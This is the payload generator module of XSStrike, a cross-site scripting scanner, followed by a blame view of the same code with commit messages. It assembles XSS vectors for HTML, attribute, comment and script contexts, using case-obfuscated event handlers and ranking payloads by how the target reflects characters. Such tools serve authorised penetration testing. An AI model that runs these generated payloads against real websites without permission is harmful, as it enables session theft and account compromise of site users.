XSStrike/core/generator.py

from core.config import badTags, fillings, eFillings, lFillings, jFillings, eventHandlers, tags, functions
from core.jsContexter import jsContexter
from core.utils import randomUpper as r, genGen, extractScripts


def generator(occurences, response):
    scripts = extractScripts(response)
    index = 0
    vectors = {11: set(), 10: set(), 9: set(), 8: set(), 7: set(),
               6: set(), 5: set(), 4: set(), 3: set(), 2: set(), 1: set()}
    for i in occurences:
        context = occurences[i]['context'][0]
        breaker = occurences[i]['context'][1]
        special = occurences[i]['context'][2]
        attribute = occurences[i]['context'][3]
        if special not in badTags:
            special = ''
        elif context == 'attribute':
            special = '</' + special + '/>'
        else:
            special = ''
        if context == 'html':
            lessBracketEfficiency = occurences[i]['score']['<']
            greatBracketEfficiency = occurences[i]['score']['>']
            breakerEfficiency = occurences[i]['score'][breaker]
            if breaker == '\'' or breaker == '"':
                breaker = ''
                breakerEfficiency = 100
            ends = ['//']
            if greatBracketEfficiency == 100:
                ends.append('>')
            if lessBracketEfficiency == breakerEfficiency == 100:
                payloads = genGen(fillings, eFillings, lFillings,
                                  eventHandlers, tags, functions, ends, breaker, special)
                for payload in payloads:
                    vectors[10].add(payload)
        elif context == 'attribute':
            breakerEfficiency = occurences[i]['score'][breaker]
            greatBracketEfficiency = occurences[i]['score']['>']
            ends = ['//']
            if greatBracketEfficiency == 100:
                ends.append('>')
            if greatBracketEfficiency == 100 and breakerEfficiency == 100:
                payloads = genGen(fillings, eFillings, lFillings,
                                  eventHandlers, tags, functions, ends, breaker, special)
                for payload in payloads:
                    if breaker:
                        payload = payload.replace(breaker, breaker + '>')
                    else:
                        payload = '>' + payload
                    vectors[10].add(payload)
            if breakerEfficiency == 100:
                for filling in fillings:
                    for function in functions:
                        vector = breaker + filling + 'auTOfOcuS' + \
                            filling + 'OnFoCUs' + '=' + breaker + function
                        vectors[6].add(vector)
            if breakerEfficiency == 90:
                for filling in fillings:
                    for function in functions:
                        vector = '\\' + breaker + filling + 'auTOfOcuS' + filling + \
                            'OnFoCUs' + '=' + function + filling + '\\' + breaker
                        vectors[6].add(vector)
            if attribute == 'srcdoc':
                if occurences[i]['score']['&lt;']:
                    if occurences[i]['score']['&gt;']:
                        del ends[:]
                        ends.append('&t;')
                    payloads = genGen(
                        fillings, eFillings, lFillings, eventHandlers, tags, functions, ends, '', '')
                    for payload in payloads:
                        vectors[10].add(payload.replace('<', '&lt;'))
        elif context == 'comment':
            lessBracketEfficiency = occurences[i]['score']['<']
            greatBracketEfficiency = occurences[i]['score']['>']
            breakerEfficiency = occurences[i]['score'][breaker]
            ends = ['//']
            if greatBracketEfficiency == 100:
                ends.append('>')
            if lessBracketEfficiency == breakerEfficiency == 100:
                payloads = genGen(fillings, eFillings, lFillings,
                                  eventHandlers, tags, functions, ends, breaker, special)
                for payload in payloads:
                    vectors[10].add(payload)
        elif context == 'script':
            try:
                script = scripts[index]
            except IndexError:
                try:
                    script = scripts[0]
                except:
                    continue
            closer = jsContexter(script)
            scriptEfficiency = occurences[i]['score']['</scRipT/>']
            greatBracketEfficiency = occurences[i]['score']['>']
            breakerEfficiency = occurences[i]['score'][breaker]
            ends = ['//']
            if greatBracketEfficiency == 100:
                ends.append('>')
            if scriptEfficiency == 100:
                breaker = r('</script/>')
                payloads = genGen(fillings, eFillings, lFillings,
                                  eventHandlers, tags, functions, ends, breaker, special)
                for payload in payloads:
                    vectors[10].add(payload)
            if closer:
                suffix = '//\\'
                if not breaker:
                    closer = closer[1:]
                if breakerEfficiency != 100:
                    breaker = ''
                for filling in jFillings:
                    for function in functions:
                        vector = breaker + closer + filling + function + suffix
                        vectors[7].add(vector)
            elif breakerEfficiency > 83:
                suffix = '//'
                for filling in jFillings:
                    for function in functions:
                        if '=' in function:
                            function = '(' + function + ')'
                        if breaker == '':
                            filling = ''
                        vector = '\\' + breaker + closer + filling + function + suffix
                        vectors[6].add(vector)
            index += 1
    return vectors
Fixed HTML comment context handling + Refactor 2018-11-15 15:41:01 +05:30			`from core.config import badTags, fillings, eFillings, lFillings, jFillings, eventHandlers, tags, functions`
Add files via upload 2018-10-27 18:58:52 +05:30			`from core.jsContexter import jsContexter`
			`from core.utils import randomUpper as r, genGen, extractScripts`

Documentation and pep8 compilance 2018-11-16 21:13:45 +05:30
Add files via upload 2018-10-27 18:58:52 +05:30			`def generator(occurences, response):`
			`scripts = extractScripts(response)`
			`index = 0`
Documentation and pep8 compilance 2018-11-16 21:13:45 +05:30			`vectors = {11: set(), 10: set(), 9: set(), 8: set(), 7: set(),`
			`6: set(), 5: set(), 4: set(), 3: set(), 2: set(), 1: set()}`
Add files via upload 2018-10-27 18:58:52 +05:30			`for i in occurences:`
			`context = occurences[i]['context'][0]`
			`breaker = occurences[i]['context'][1]`
			`special = occurences[i]['context'][2]`
Fixes #79, Fixes 80, Fixes #81 2018-11-03 22:49:40 +05:30			`attribute = occurences[i]['context'][3]`
Add files via upload 2018-10-27 18:58:52 +05:30			`if special not in badTags:`
			`special = ''`
			`elif context == 'attribute':`
			`special = '</' + special + '/>'`
			`else:`
			`special = ''`
			`if context == 'html':`
			`lessBracketEfficiency = occurences[i]['score']['<']`
			`greatBracketEfficiency = occurences[i]['score']['>']`
			`breakerEfficiency = occurences[i]['score'][breaker]`
quotes aren't valid breakers in JSON 2018-10-28 12:43:52 +05:30			`if breaker == '\'' or breaker == '"':`
			`breaker = ''`
			`breakerEfficiency = 100`
Add files via upload 2018-10-27 18:58:52 +05:30			`ends = ['//']`
			`if greatBracketEfficiency == 100:`
			`ends.append('>')`
			`if lessBracketEfficiency == breakerEfficiency == 100:`
Documentation and pep8 compilance 2018-11-16 21:13:45 +05:30			`payloads = genGen(fillings, eFillings, lFillings,`
			`eventHandlers, tags, functions, ends, breaker, special)`
Add files via upload 2018-10-27 18:58:52 +05:30			`for payload in payloads:`
			`vectors[10].add(payload)`
			`elif context == 'attribute':`
			`breakerEfficiency = occurences[i]['score'][breaker]`
			`greatBracketEfficiency = occurences[i]['score']['>']`
			`ends = ['//']`
			`if greatBracketEfficiency == 100:`
			`ends.append('>')`
			`if greatBracketEfficiency == 100 and breakerEfficiency == 100:`
Documentation and pep8 compilance 2018-11-16 21:13:45 +05:30			`payloads = genGen(fillings, eFillings, lFillings,`
			`eventHandlers, tags, functions, ends, breaker, special)`
Add files via upload 2018-10-27 18:58:52 +05:30			`for payload in payloads:`
			`if breaker:`
			`payload = payload.replace(breaker, breaker + '>')`
			`else:`
			`payload = '>' + payload`
			`vectors[10].add(payload)`
			`if breakerEfficiency == 100:`
			`for filling in fillings:`
			`for function in functions:`
Documentation and pep8 compilance 2018-11-16 21:13:45 +05:30			`vector = breaker + filling + 'auTOfOcuS' + \`
			`filling + 'OnFoCUs' + '=' + breaker + function`
Add files via upload 2018-10-27 18:58:52 +05:30			`vectors[6].add(vector)`
Add files via upload 2018-11-11 14:56:19 +05:30			`if breakerEfficiency == 90:`
			`for filling in fillings:`
			`for function in functions:`
Documentation and pep8 compilance 2018-11-16 21:13:45 +05:30			`vector = '\\' + breaker + filling + 'auTOfOcuS' + filling + \`
			`'OnFoCUs' + '=' + function + filling + '\\' + breaker`
Add files via upload 2018-11-11 14:56:19 +05:30			`vectors[6].add(vector)`
Fixes #79, Fixes 80, Fixes #81 2018-11-03 22:49:40 +05:30			`if attribute == 'srcdoc':`
			`if occurences[i]['score']['<']:`
			`if occurences[i]['score']['>']:`
			`del ends[:]`
			`ends.append('&t;')`
Documentation and pep8 compilance 2018-11-16 21:13:45 +05:30			`payloads = genGen(`
			`fillings, eFillings, lFillings, eventHandlers, tags, functions, ends, '', '')`
Fixes #79, Fixes 80, Fixes #81 2018-11-03 22:49:40 +05:30			`for payload in payloads:`
			`vectors[10].add(payload.replace('<', '<'))`
Add files via upload 2018-10-27 18:58:52 +05:30			`elif context == 'comment':`
			`lessBracketEfficiency = occurences[i]['score']['<']`
			`greatBracketEfficiency = occurences[i]['score']['>']`
			`breakerEfficiency = occurences[i]['score'][breaker]`
			`ends = ['//']`
			`if greatBracketEfficiency == 100:`
			`ends.append('>')`
			`if lessBracketEfficiency == breakerEfficiency == 100:`
Documentation and pep8 compilance 2018-11-16 21:13:45 +05:30			`payloads = genGen(fillings, eFillings, lFillings,`
			`eventHandlers, tags, functions, ends, breaker, special)`
Add files via upload 2018-10-27 18:58:52 +05:30			`for payload in payloads:`
			`vectors[10].add(payload)`
			`elif context == 'script':`
			`try:`
			`script = scripts[index]`
			`except IndexError:`
Fixes #79, Fixes 80, Fixes #81 2018-11-03 22:49:40 +05:30			`try:`
			`script = scripts[0]`
			`except:`
			`continue`
Add files via upload 2018-10-27 18:58:52 +05:30			`closer = jsContexter(script)`
			`scriptEfficiency = occurences[i]['score']['</scRipT/>']`
			`greatBracketEfficiency = occurences[i]['score']['>']`
			`breakerEfficiency = occurences[i]['score'][breaker]`
			`ends = ['//']`
			`if greatBracketEfficiency == 100:`
			`ends.append('>')`
			`if scriptEfficiency == 100:`
			`breaker = r('</script/>')`
Documentation and pep8 compilance 2018-11-16 21:13:45 +05:30			`payloads = genGen(fillings, eFillings, lFillings,`
			`eventHandlers, tags, functions, ends, breaker, special)`
Add files via upload 2018-10-27 18:58:52 +05:30			`for payload in payloads:`
			`vectors[10].add(payload)`
			`if closer:`
			`suffix = '//\\'`
			`if not breaker:`
			`closer = closer[1:]`
better multi js context injection 2018-11-10 21:24:53 +05:30			`if breakerEfficiency != 100:`
handle potential false positives in slash escape 2018-10-30 11:37:06 +05:30			`breaker = ''`
Add files via upload 2018-10-27 18:58:52 +05:30			`for filling in jFillings:`
			`for function in functions:`
Fixed a bug in JS context payload generator 2018-10-28 21:43:06 +05:30			`vector = breaker + closer + filling + function + suffix`
Add files via upload 2018-10-27 18:58:52 +05:30			`vectors[7].add(vector)`
handle potential false positives in slash escape 2018-10-30 11:37:06 +05:30			`elif breakerEfficiency > 83:`
Add files via upload 2018-10-27 18:58:52 +05:30			`suffix = '//'`
			`for filling in jFillings:`
			`for function in functions:`
			`if '=' in function:`
			`function = '(' + function + ')'`
			`if breaker == '':`
			`filling = ''`
			`vector = '\\' + breaker + closer + filling + function + suffix`
			`vectors[6].add(vector)`
			`index += 1`
better multi js context injection 2018-11-10 21:24:53 +05:30			`return vectors`